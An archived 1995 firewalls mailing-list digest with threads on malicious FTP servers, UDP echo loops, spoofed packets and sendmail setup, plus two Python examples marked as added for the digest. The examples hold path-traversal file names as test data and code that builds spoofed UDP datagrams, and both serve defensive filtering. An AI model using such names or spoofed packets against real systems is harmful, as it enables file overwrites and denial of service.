First you have to learn never to get files from systems you don't "own" directly into standard directories. Always use a "/var/tmp"-like directory to get files. Never be "root" or an admin account when getting files.

The risk seems real. I might set up an ftp server with a /pub/network/config directory where you see a bunch of "near ready to use" files: named.boot, named.local, resolv.conf and named... tools to config and start a DNS. Now I can bet people getting these files are most likely to do that from a Unix system. I can bet 80 % of them are "root" on their own machines. You might be cautious enough to get the files while in your /var/tmp directory. But what happens if my ftp server generates, in response to your mget command, among many named.* file names, a "/etc/passwd" file name? (I can even be more subtle than just rewriting your /etc/passwd file.)

Would it work?

E. SALOME
____________________________________________________________________________________
Eric Salome - CERTIX                Eric.Salome@siege.cnes.fr
(ALTIOR Consultant at the CNES at this time)
**** All opinions expressed are my own and not necessarily those of my employer ****

From firewalls-owner Wed May 17 06:35:20 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA15488 for firewalls-outgoing; Wed, 17 May 1995 06:03:40 -0700
Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA15483 for ; Wed, 17 May 1995 06:03:36 -0700
Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA04611; Wed, 17 May 1995 09:03:13 -0400
Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA05510; Wed, 17 May 1995 09:03:10 -0400
Message-Id: <9505171303.AA05510@wellspring.us.dg.com>
Comments: Authenticated sender is
From: "Jim Carroll"
Organization: Data General (Canada) Inc.
To: Tim Keanini , firewalls@greatcircle.com
Date: Wed, 17 May 1995 09:02:58 -0500
Subject: Re: PASV Mac or Windows Client
Reply-To: jcarroll@wellspring.us.dg.com
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.0-WB1)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On 16 May 95 at 17:19, Tim Keanini was heard to utter:

>
> I am trying to locate a PASV ftp client for Mac and Windows.
> I can't use Netscape or Mosaic because this is for uploading files.
> I checked out the latest Fetch and Anarchie and they both DO NOT do
> PASV.

For MS-Windows, check out WS_FTP. Note that there's also a 32-bit version.

-- 
Jim Carroll - jcarroll@wellspring.us.dg.com
... the usual disclaimers ...
## If you like this sort of thing,         ##
## this is the sort of thing you'll like.
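Back to the malicious-server FTP thread above (Edward Maillet's NLST question and Eric Salomé's "/etc/passwd" twist): the following is an added example, written for this digest and not code from any poster or from any real FTP client. It applies the check a client should run on the server's name list before issuing a single RETR for an "mget *.ps": only bare file names that match the pattern are fetched, so absolute paths, DOS paths, home-relative paths, dot-files and traversal are refused. The NLST reply is constructed.

```python
"""Client-side NLST filter for the malicious-server problem discussed above.

An "mget *.ps" sends "NLST *.ps" and then retrieves every name the server
returns.  A hostile server can pad that list with names the client never
asked for, so the client should check each name before issuing RETR.

Added example for this digest; not code from any poster or FTP client.
The NLST reply below is constructed to exercise the checks.
"""
import fnmatch

# Constructed NLST reply: two real matches plus names a hostile server might
# slip in (absolute path, DOS path, home-relative path, dot-file, traversal,
# and a plain name that does not match the pattern).
SAMPLE_NLST = (
    "paper1.ps\r\n"
    "paper2.ps\r\n"
    "/etc/passwd\r\n"
    "\\autoexec.bat\r\n"
    "~/.profile\r\n"
    ".forward\r\n"
    "../.rhosts\r\n"
    "ls\r\n"
)


def check_nlst_entry(name, pattern):
    """Return None if 'name' may be fetched for an mget of 'pattern', else a reason.

    Assumes the pattern is a plain glob such as "*.ps" (no directory part), so
    any name with a path component is refused outright.
    """
    if not name or any(c in name for c in "\x00\r\n"):
        return "empty name or control characters"
    if "\\" in name or ":" in name:
        # DOS/Windows separators and drive letters: \autoexec.bat, C:\config.sys
        return "DOS path separator or drive letter"
    if name.startswith(("/", "~")):
        return "absolute or home-relative path"
    if "/" in name:
        # NLST for a glob should return bare file names; ../.rhosts is not one.
        return "contains a directory component"
    if name.startswith("."):
        # .forward, .profile, .rhosts: never the intent of a glob like *.ps
        return "hidden file"
    if not fnmatch.fnmatchcase(name, pattern):
        return "does not match requested pattern %r" % pattern
    return None


def filter_nlst(reply, pattern):
    """Split an NLST reply into names safe to RETR and names to refuse.

    Returns (accepted, rejected); rejected is a list of (name, reason) pairs.
    """
    accepted, rejected = [], []
    for name in reply.splitlines():
        reason = check_nlst_entry(name, pattern)
        if reason is None:
            accepted.append(name)
        else:
            rejected.append((name, reason))
    return accepted, rejected


if __name__ == "__main__":
    ok, bad = filter_nlst(SAMPLE_NLST, "*.ps")
    print("would RETR:", ok)
    for name, why in bad:
        print("refused %-16r %s" % (name, why))
```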
##

From firewalls-owner Wed May 17 06:56:11 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA15515 for firewalls-outgoing; Wed, 17 May 1995 06:04:09 -0700
Received: from gatekeeper.ddp.state.me.us (gatekeeper.ddp.state.me.us [141.114.130.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA15509 for ; Wed, 17 May 1995 06:04:05 -0700
Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id IAA05973; Wed, 17 May 1995 08:58:47 -0400
Date: Wed, 17 May 1995 08:58:46 -0400 (EDT)
From: David Miller
Subject: Re: Malicious Servers. Do clients guard against? (FTP example)
To: Jeff Murphy
cc: Edward Maillet , firewalls@GreatCircle.COM
In-Reply-To: <199505170250.WAA14440@smurfland.cit.buffalo.edu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 16 May 1995, Jeff Murphy wrote:

> Edward Maillet writes:
> >Here are the details of how I'd do it:
> >The mget command for FTP issues (among other things) an NLST command which
> >requests from the server a list of file names. An "mget *.ps" generates an
> >NLST *.ps. The client then retrieves each of the files in the list.
> >Would your FTP client notice if in the returned list of file names some
> >names don't match the *.ps request?
>
> assuming this happens, how would this affect the end user?
> i'm assuming that the ftp daemon ships over a bunch of *.ps
> files and also something called "ls", in hopes that you
> have the current dir as the first item in your path and that
> you quit and type "ls"...
>
> for this to work you need to know the OS that you are sending
> the files to. another problem is that files brought over won't
> (for unix at least) be executable at first...
>
> am i missing your point? what other security aspects are there
> to shipping over a file that wasn't requested?

How about \autoexec.bat, \config.sys, or overwriting existing files like ~/.profile that, combined with ./..., does dastardly things?

>
> jeff
>

----------------------------------------------------------------------------
It's *amazing* what one can accomplish when one doesn't know what one can't do!

From firewalls-owner Wed May 17 07:11:57 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA16048 for firewalls-outgoing; Wed, 17 May 1995 06:47:37 -0700
Received: from vdoehp.vak12ed.edu (vdoehp.vak12ed.edu [141.104.22.101]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA16043 for ; Wed, 17 May 1995 06:47:33 -0700
Message-Id: <199505171347.GAA16043@miles.greatcircle.com>
Received: by vdoehp.vak12ed.edu (1.37.109.16/16.2) id AA164668369; Wed, 17 May 1995 09:46:09 -0400
From: "W.C. Epperson"
Subject: Re: Monitoring outgoing traffic
To: smith@sctc.com (Rick Smith)
Date: Wed, 17 May 95 9:46:08 EDT
Cc: firewalls@greatcircle.com
In-Reply-To: <199505161549.KAA24388@shade.sctc.com>; from "Rick Smith" at May 16, 95 10:49 am
Mailer: Elm [revision: 70.85]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I don't generally think of my pocket or briefcase as being a forum
> for the "public release" of information. The Internet is.
>
> Besides, computers and people have different trust properties.
>
> How often do you stick a sensitive document in a briefcase or pocket
> by accident? Rarely, I expect. But even if you did, you still had
> *lots* of opportunities to discover the error and then protect the
> document from compromise. (thanks, Beede)
>

Not long ago, I sat on an airliner next to someone who was reviewing a mortgage application and credit report, in full readable view of myself, the airline staff, and anyone on the way to the head.... But this part of the discussion probably belongs on "risks", not "firewalls".

-- 
W.C. Epperson                    "I have great faith in fools.
Senior SE                         Self-confidence, my friends call it."
Virginia Dept. of Education            --E.A. Poe--
epperson@vdoehp.vak12ed.edu

From firewalls-owner Wed May 17 07:44:20 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA16281 for firewalls-outgoing; Wed, 17 May 1995 06:57:45 -0700
Received: from alexander.erg.sri.com (alexander.erg.sri.com [128.18.110.55]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA16276 for ; Wed, 17 May 1995 06:57:42 -0700
Received: from localhost.erg.sri.com by alexander.erg.sri.com (5.65/2.7davy) id AA29247; Wed, 17 May 95 06:57:50 -0700
Message-Id: <9505171357.AA29247@alexander.erg.sri.com>
To: Eric.Salome@siege.cnes.fr (Eric Salomi)
Cc: firewalls@greatcircle.com
Subject: Re: Malicious Servers. Do clients guard against? (FTP example)
In-Reply-To: Your message of Wed, 17 May 95 14:20:22 +0200. <199505171221.OAA01162@paclas01.siege.cnes.fr>
Date: Wed, 17 May 95 06:57:48 -0700
From: Bryan McDonald
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We had a user here ftp a .forward file into his homedir, and it took him 3 days to realize it (long weekend). You could do all sorts of things to someone without really trying hard at all.
Bryan

From firewalls-owner Wed May 17 08:01:35 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA16802 for firewalls-outgoing; Wed, 17 May 1995 07:26:06 -0700
Received: from brimstone.soscorp.com (soscorp.soscorp.com [204.52.248.130]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA16797 for ; Wed, 17 May 1995 07:26:03 -0700
Received: from fearless.soscorp.com (fearless.soscorp.com [204.52.249.130]) by brimstone.soscorp.com ($Revision: 2.21 $/8.6.12/8.6.4.287) with BSMTP id BS0026779/KAA26782; Wed, 17 May 1995 10:25:45 -0400
Received: (ari@localhost) by fearless.soscorp.com (8.6.10/8.6.4.287) id KAA25192; Wed, 17 May 1995 10:25:01 -0400
Date: Wed, 17 May 1995 10:25:01 -0400
From: ari@soscorp.com (Ari Shamash)
Message-Id: <199505171425.KAA25192@fearless.soscorp.com>
To: steveg@cseic.saic.com (Stephen Harold Goldstein)
Cc: firewalls@GreatCircle.COM
Subject: Firewall Web Page
In-Reply-To: <9505151429.AA22128@cseic.saic.com>
References: <9505151429.AA22128@cseic.saic.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>>>>> On Mon, 15 May 95 10:29:28 EDT, steveg@cseic.saic.com (Stephen Harold Goldstein) said:

Stephen> Could someone please send me the *current* URL for
Stephen> the "Firewall Products" Web page maintained by a kind
Stephen> reader of this list?

The list is at:
http://www.access.digex.net/~bdboyle/firewall.vendor.html

And there is a backup copy at:
http://www.waterw.com/~manowar/vendor.html

Ari

From firewalls-owner Wed May 17 08:31:47 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA18478 for firewalls-outgoing; Wed, 17 May 1995 08:20:12 -0700
Received: from Sumtoi.UH.EDU (Sumtoi.UH.EDU [129.7.1.19]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA18473 for ; Wed, 17 May 1995 08:20:08 -0700
Received: from Jetson.UH.EDU by Jetson.UH.EDU (PMDF V4.3-10 #8380) id <01HQLTY3T7SG8Y5NBY@Jetson.UH.EDU>; Wed, 17 May 1995 10:19:49 -0500 (CDT)
Date: Wed, 17 May 1995 10:19:49 -0500 (CDT)
From: JAY LYALL
Subject: VM Office Vision behind a firewall
To: firewalls@greatcircle.com
Message-id: <01HQLTY3UK0I8Y5NBY@Jetson.UH.EDU>
X-VMS-To: IN%"firewalls@greatcircle.com"
MIME-version: 1.0
Content-type: TEXT/PLAIN; CHARSET=US-ASCII
Content-transfer-encoding: 7BIT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I've got a client running VM Office Vision behind a multi-homed firewall that uses sendmail. How do I tell OV to route mail destined outside the domain to be sent to the gateway?

Any and all help is deeply appreciated.

From firewalls-owner Wed May 17 09:01:52 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA18788 for firewalls-outgoing; Wed, 17 May 1995 08:32:27 -0700
Received: from maily1.prodigy.com (maily1.prodigy.com [192.207.105.55]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA18783 for ; Wed, 17 May 1995 08:32:24 -0700
Received: (from frank@localhost) by maily1.prodigy.com (8.6.10/8.6.9) id LAA29416; Wed, 17 May 1995 11:31:02 -0400
Date: Wed, 17 May 1995 11:31:01 -0400 (EDT)
From: Frank Wortner
To: Firewalls
Subject: Re: Malicious Servers. Do clients guard against? (FTP example)
In-Reply-To: <199505170438.AAA20261@cyber.zone.net>
Message-ID:
X-Mail-1: Prodigy Services Co.
X-Mail-2: 1565 Front Street
X-Mail-3: Yorktown Heights NY 10598
X-Phone: 1-914-448-1740
X-FAX: 1-914-448-1946
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 17 May 1995, Peter C. Norton wrote:

> There's got to be something that makes this untenable, or it would
> have happened a long time ago. I think.

One possibility is that the UNIX FTP clients usually have "prompt" enabled. That requires the user to approve each file transferred by an "mget". Of course, it's also possible to disable "prompt" --- as is often done when the list of files to be transferred is large.

Frank

-- 
"Outside of a dog, a book is a man's best friend; inside of a dog, it's too dark to read." -- Groucho Marx

From firewalls-owner Wed May 17 09:26:59 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA18287 for firewalls-outgoing; Wed, 17 May 1995 08:13:27 -0700
Received: from ns.ge.com (ns.ge.com [192.35.39.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA18282 for ; Wed, 17 May 1995 08:13:24 -0700
Received: from mak.is.ge.com ([3.19.100.81]) by ns.ge.com (8.6.12/8.6.11) with ESMTP id LAA05045 for ; Wed, 17 May 1995 11:13:04 -0400
Message-Id: <199505171513.LAA05045@ns.ge.com>
Received: by mak.is.ge.com (1.37.109.9/15.6) id AA037874734; Wed, 17 May 1995 10:13:02 -0500
From: Mohamad A Khatoun
Subject: Re: Sendmail Question
To: firewalls@greatcircle.com
Date: Wed, 17 May 95 10:13:02 CDT
Mailer: Elm [revision: 70.85]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I have a question regarding sendmail configuration over a firewall. This
> firewall is using smap to receive mail, and sendmail to send the outgoing
> mail.
>
> The topology looks something like the following:
>
>      Untrusted                    Trusted
>
>   World ---- Firewall ----- Mailhost -- PostOffice1
>                                  |
>                                  +---- PostOffice2
>                                  |
>                                  +---- PostOffice3
>
> We want the following to happen:
> All mail from the internal trusted hosts will arrive at the Firewall
> with destination addresses and from addresses. We want all outgoing mail
> to appear to be originating from user@domain.name (ie user@foo.com). This
> will require the outgoing from header to be rewritten.
> We want all incoming mail to the Firewall to parse through an aliases
> file which may rewrite the outgoing email address. Also, all mail destined
> for the internal network will be handed off to the internal Mailhost. The
> Mailhost is not intelligent enough to rewrite headers, so we must rewrite
> the headers with the firewall such that it identifies to which post office
> the mail is destined. I realize this is not a normal function of a fw, however
> this is going to have to be as such.
>
> ---
>
> Two things. Rewrite To headers based on an aliases file, and rewrite
> outgoing from addresses if they are NOT to a set of hosts. I can make the
> outgoing headers be rewritten, however it will then change the destination
> addresses within the domain to user@domain.name. I can make the sendmail
> parse the aliases file and hand it off to the mailhost correctly, but then
> mail that "replies" to sent mail from the internal hosts is destined for
> user@PostOfficeX.domain.name, instead of user@domain.name. I could use MX
> records to make PostOfficeX.domain.name have two destinations, firewall
> and mailhost, with mailhost a higher priority, to "hop" it through, however
> this is not preferred.
>
> I have struggled with this for some time, and have not been able to figure
> out how to do it.
>
> Any help appreciated. I apologize if this is too narrow of a concern, though
> I can see this configuration being of use in many firewall configurations.
>
> --
> Alan Hannan alan@mid.net
>

Unless I misunderstand your question, I think that you have the answer but you have to organize your thoughts. While I am not an expert on sendmail, I have spoken with many who are. The solution that is frequently recommended is as follows.

Outbound Mail:

1) Set up the sendmail.cf file on each internal machine to send non-local mail to the firewall.

2) On the firewall, configure sendmail with the "site hiding option", which changes the From: header to your desired domain name.

Inbound Mail:

1) Configure MX records on the firewall to forward incoming mail, destined for your domain, to your internal mail servers. For example, your MX record would be:

        yourdomain.com    MX    mailserver1

2) Set up system alias files on your mail servers to forward users' mail to the proper internal machines. Sendmail does not rewrite the From header; internal users can still reply to the mail. For example, if the user chuck wants to receive his mail on an internal machine called babbage, the mail should contain an alias similar to the following:

        chuck@yourdomain.com    chuck@babbage

When external users reply to your users' messages, the reply will come to the firewall, which forwards it to the mail servers. The mail servers check the user name in the alias file and send the mail to the proper host.

Cheers,
Mohamad

From firewalls-owner Wed May 17 10:10:15 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA20487 for firewalls-outgoing; Wed, 17 May 1995 09:42:59 -0700
Received: from bosoleil.ci.umoncton.ca (bosoleil.ci.umoncton.ca [139.103.2.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA20482 for ; Wed, 17 May 1995 09:42:50 -0700
From: eav1001@Umoncton.CA
Received: by bosoleil.ci.umoncton.ca (1.37.109.14/16.2) id AA162369017; Wed, 17 May 1995 13:43:37 -0300
Date: Wed, 17 May 1995 13:43:37 -0300 (ADT)
Subject: Re: Requesting "echo"
To: firewalls@greatcircle.com
In-Reply-To: <199505170948.LAA05881@champagne.edelweb.fr>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 17 May 1995, Jean-Christophe Touvet wrote:

> > Not blocking the echo port (port 7) or somehow preventing packets with
> > spoofed IP addresses from entering the system could be even more
> > disastrous to a site. Consider this scenario:
> >
> > A packet enters the network with a spoofed IP address (say of the
> > backup server), with source port 514 (port for remote shell), and the
> > payload consisting of a valid RSH-type "header" and content. This
> > packet then gets echoed back to the backup server with the IP source
> > address of the client. If the server trusts this host (and most
> > backup hosts must, so remote dumps can happen), then what?
>
> Hmm, I'm not sure it would be so easy with TCP services.
>
> But there is at least one very annoying attack with UDP echo: send a spoofed
> UDP packet with both source and destination port=7. Guess what ?
>                                                      ^^^^^^^^^^
> -JCT-
>

What to guess? Would you guys give more explanations, please? Also, what is a spoofed UDP packet?

Thank you and have a good day...!
mustA_heart

From firewalls-owner Wed May 17 10:35:51 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA21272 for firewalls-outgoing; Wed, 17 May 1995 10:06:10 -0700
Received: from gatekeeper.ddp.state.me.us (gatekeeper.ddp.state.me.us [141.114.130.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA21267 for ; Wed, 17 May 1995 10:06:07 -0700
Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id NAA20340; Wed, 17 May 1995 13:00:49 -0400
Date: Wed, 17 May 1995 13:00:49 -0400 (EDT)
From: David Miller
Subject: Re: VM Office Vision behind a firewall
To: JAY LYALL
cc: firewalls@greatcircle.com
In-Reply-To: <01HQLTY3UK0I8Y5NBY@Jetson.UH.EDU>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 17 May 1995, JAY LYALL wrote:

>
> I've got a client running VM Office Vision behind a multi-homed firewall that
> uses sendmail. How do I tell OV to route mail destined outside the domain to
> be sent to the gateway?
>
> Any and all help is deeply appreciated.

Get an smtp gateway for OV. OV is neither sendmail nor SMTP; getting a firewall running sendmail to pass it just isn't going to happen :(

---
David
----------------------------------------------------------------------------
It's *amazing* what one can accomplish when one doesn't know what one can't do!
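Back to eav1001's question in the "Requesting echo" thread above (what is a spoofed UDP packet, and what is there to guess about source port 7 to destination port 7): the following is an added example written for this digest, not code from any poster. It parses a raw IPv4/UDP datagram as a border filter would see it and applies the two rules that thread argues for, refusing inbound datagrams whose source address claims to be internal and refusing UDP echo (port 7), with the 7-to-7 loop explained in the comments. The internal prefix 192.168.1.0/24, the outside addresses and the datagrams are constructed.

```python
"""Border-filter check for the UDP echo issue raised in the "Requesting echo"
thread: spoofed internal source addresses and UDP echo (port 7) traffic.

Added example for this digest, not code from any poster.  The internal
prefix 192.168.1.0/24 and the datagrams below are constructed test data.
"""
import ipaddress
import struct

ECHO_PORT = 7
IPPROTO_UDP = 17


def build_ipv4_udp(src, dst, sport, dport, payload=b"x"):
    """Build a minimal IPv4+UDP datagram for testing (checksums left zero)."""
    udp_len = 8 + len(payload)
    udp = struct.pack("!HHHH", sport, dport, udp_len, 0) + payload
    ip = struct.pack(
        "!BBHHHBBH4s4s",
        0x45, 0, 20 + udp_len, 0, 0, 64, IPPROTO_UDP, 0,
        ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed,
    )
    return ip + udp


def parse_ipv4_udp(pkt):
    """Return {src, dst, sport, dport} for an IPv4/UDP datagram, else None."""
    if len(pkt) < 28 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != IPPROTO_UDP or len(pkt) < ihl + 8:
        return None
    sport, dport = struct.unpack("!HH", pkt[ihl:ihl + 4])
    return {
        "src": ipaddress.IPv4Address(pkt[12:16]),
        "dst": ipaddress.IPv4Address(pkt[16:20]),
        "sport": sport,
        "dport": dport,
    }


def filter_inbound(pkt, internal_net):
    """Decide whether a datagram arriving on the external interface may enter.

    Returns (verdict, reason).  Anti-spoofing comes first: a datagram from the
    Internet carrying one of our own addresses is what lets an outsider make
    two internal hosts talk to each other on his behalf.
    """
    hdr = parse_ipv4_udp(pkt)
    if hdr is None:
        return ("pass", "not IPv4/UDP; left to other rules")
    if hdr["src"] in internal_net:
        return ("drop", "spoofed internal source %s on external interface" % hdr["src"])
    if hdr["dport"] == ECHO_PORT and hdr["sport"] == ECHO_PORT:
        # The echo server replies to port 7 of the claimed source, which is itself
        # an echo server, so the datagram bounces between the two hosts until it
        # is lost; nobody has to send a second packet to keep it going.
        return ("drop", "echo-to-echo UDP datagram: would start an echo loop")
    if hdr["dport"] == ECHO_PORT:
        return ("drop", "UDP echo is not offered to the outside")
    return ("pass", "no rule matched")


INTERNAL = ipaddress.IPv4Network("192.168.1.0/24")  # constructed site prefix

# Constructed datagrams as seen arriving on the external interface.
SAMPLES = {
    "spoofed echo loop": build_ipv4_udp("192.168.1.10", "192.168.1.20", 7, 7),
    "outside echo loop": build_ipv4_udp("198.51.100.7", "192.168.1.20", 7, 7),
    "outside echo probe": build_ipv4_udp("198.51.100.7", "192.168.1.20", 4000, 7),
    "dns reply": build_ipv4_udp("198.51.100.53", "192.168.1.20", 53, 1234),
}

if __name__ == "__main__":
    for label, pkt in SAMPLES.items():
        verdict, why = filter_inbound(pkt, INTERNAL)
        print("%-20s %-4s %s" % (label, verdict, why))
```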
From firewalls-owner Wed May 17 10:56:52 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA21379 for firewalls-outgoing; Wed, 17 May 1995 10:13:57 -0700
Received: from styx.sif.state.ny.us (styx.sif.state.ny.us [168.141.118.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA21373 for ; Wed, 17 May 1995 10:13:51 -0700
Received: (uucp@localhost) by styx.sif.state.ny.us (8.6.12/8.6.9) id NAA18695 for ; Wed, 17 May 1995 13:12:21 -0400
Received: from zeus.sif.state.ny.us(168.141.100.10) by styx via smap (V1.0mjr) id smaa18675; Wed May 17 13:11:44 1995
Received: from dssvr1.sif.state.ny.us (dssvr1.sif.state.ny.us [168.141.107.13]) by zeus (8.6.9/8.6.5) with ESMTP id NAA08215 for ; Wed, 17 May 1995 13:06:26 -0400
Received: from DS_SVR1/MERCURY_Q by dssvr1.sif.state.ny.us (Mercury 1.21); 17 May 95 13:10:58 +1100
Received: from MERCURY_Q by DS_SVR1 (Mercury 1.21); 17 May 95 13:10:23 +1100
From: "ANNA M. KING"
Organization: New York State Insurance Fund
To: firewalls@GreatCircle.com
Date: Wed, 17 May 1995 13:10:13 EST
Subject: Packet filtering for NT firewall
Priority: normal
X-mailer: Pegasus Mail/Windows (v1.22)
Message-ID:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am setting up an NT firewall to direct traffic from some other network (the firewall will be connected to a CISCO router with multiple serial ports connected to multiple networks of various types) to a particular machine (mainframe or application server). What I need is packet filtering software. Any suggestions about what is best would be appreciated.

Thanks

Anna King
Sr. Programmer/Analyst
NY State Insurance Fund

From firewalls-owner Wed May 17 11:17:21 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA22626 for firewalls-outgoing; Wed, 17 May 1995 10:59:00 -0700
Received: from csc.com (explorer.csc.com [20.1.10.27]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA22616 for ; Wed, 17 May 1995 10:58:55 -0700
Received: by csc.com (Smail3.1.29.1 #1) id m0sBnMl-000iCwC; Wed, 17 May 95 13:58 EDT
Date: Wed, 17 May 1995 13:58:38 -0400 (EDT)
From: Adam Safier
To: Dave Roberts
cc: firewalls@greatcircle.com
Subject: Re: 1, Bastion host configuration
In-Reply-To: <3007@saa-cons.co.uk>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> Internal    +--------+      +--------------+     +--------+   Internet
>  -----------+ Router +------+   Gateway    +-----+ Router +----
> Network     +--------+      +--------------+     +--------+
>

This looks like THE CLASSIC firewall config, esp. if you have multiple subnets on the protected side. Consider an NSC router for the public link and check out Cisco's upcoming 10.4 software release.
Adam From firewalls-owner Wed May 17 11:35:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA23212 for firewalls-outgoing; Wed, 17 May 1995 11:19:29 -0700 Received: from death.netsys.com (death.netsys.com [204.160.179.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA23206 for ; Wed, 17 May 1995 11:19:25 -0700 Received: (from len@localhost) by death.netsys.com (8.6.10/HQ-Len) id LAA00807; Wed, 17 May 1995 11:18:37 -0700 From: len@NETSYS.COM (Len Rose) Message-Id: <9505171118.ZM805@death.netsys.com> Date: Wed, 17 May 1995 11:18:36 -0700 In-Reply-To: Christopher Davis "Re: ACE SecureID Flaw (SunOS 4.1.x)" (May 17, 2:10pm) References: <9505170303.ZM272@death.netsys.com> <199505171810.OAA07598@loiosh.kei.com> X-Phone: 415-528-7205 X-Mailer: Z-Mail (2.1.5 20sep93) To: Christopher Davis , len@NETSYS.COM (Len Rose) Subject: Re: ACE SecureID Flaw (SunOS 4.1.x) Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk True.. I located the stuff in Paul's distribution, but it infuriates me that ACE isn't more internet cognizant. No one uses NIS externally, unless they are foolish. Thanks Chris.. Len On May 17, 2:10pm, Christopher Davis offered an excellent suggestion: [snipped] > > The shres/INSTALL instructions in BIND 4.9.3 (currently at BETA17) include > directions (and a script) for updating both BSD and SysV shared libraries. > > They should probably add a note about this in their documentation, though, > since (as I mentioned earlier) many people skip updating the SysV libs. > [snipped] >-- End of excerpt from Christopher Davis -- len@netsys.com http://www.netsys.com "at&t. ever spend time in jail for having a small c program? you will." 
xod From firewalls-owner Wed May 17 11:58:55 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA21757 for firewalls-outgoing; Wed, 17 May 1995 10:39:06 -0700 Received: from csc.com (explorer.csc.com [20.1.10.27]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA21750 for ; Wed, 17 May 1995 10:39:02 -0700 Received: by csc.com (Smail3.1.29.1 #1) id m0sBn3R-000iFQC; Wed, 17 May 95 13:38 EDT Date: Wed, 17 May 1995 13:38:41 -0400 (EDT) From: Adam Safier To: Rick Smith cc: firewalls@greatcircle.com, smith@sctc.com Subject: Re: Why control outbound traffic? In-Reply-To: <199505152149.QAA10500@shade.sctc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >1. No. There is not a security problem with allowing unrestricted outgoing > >traffic [from a technical perspective]. > > It all depends on what you mean by "unrestricted" and what you mean by > "a technical perspective." > > Further restrictions reduce the organization's window of vulnerability > to more sophisticated technical attacks, as Andrew Molitor pointed > out. In theory users could run X-Terminal protocol through the firewall. Since their workstation is the "Server" the outside "Client" could request keystrokes, function key presses etc. I've done it in house with "dumb" terminals and termial emulator scripts (before I knew there was somthing more than hays modems). I don't see why that attack would not work with X-Terms. I suggest cutting off outgoing X-Term traffic. Do any sites actually allow outsiders to run custom X-Windows applications? 2c worth. 
Adam

From firewalls-owner Wed May 17 12:15:38 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA23037 for firewalls-outgoing; Wed, 17 May 1995 11:11:01 -0700
Received: from loiosh.kei.com (loiosh.kei.com [192.88.144.32]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA23031 for ; Wed, 17 May 1995 11:10:58 -0700
Received: (from ckd@localhost) by loiosh.kei.com (8.6.10/8.6.9) id OAA07598; Wed, 17 May 1995 14:10:39 -0400
Date: Wed, 17 May 1995 14:10:39 -0400
From: Christopher Davis
Message-Id: <199505171810.OAA07598@loiosh.kei.com>
To: len@NETSYS.COM (Len Rose)
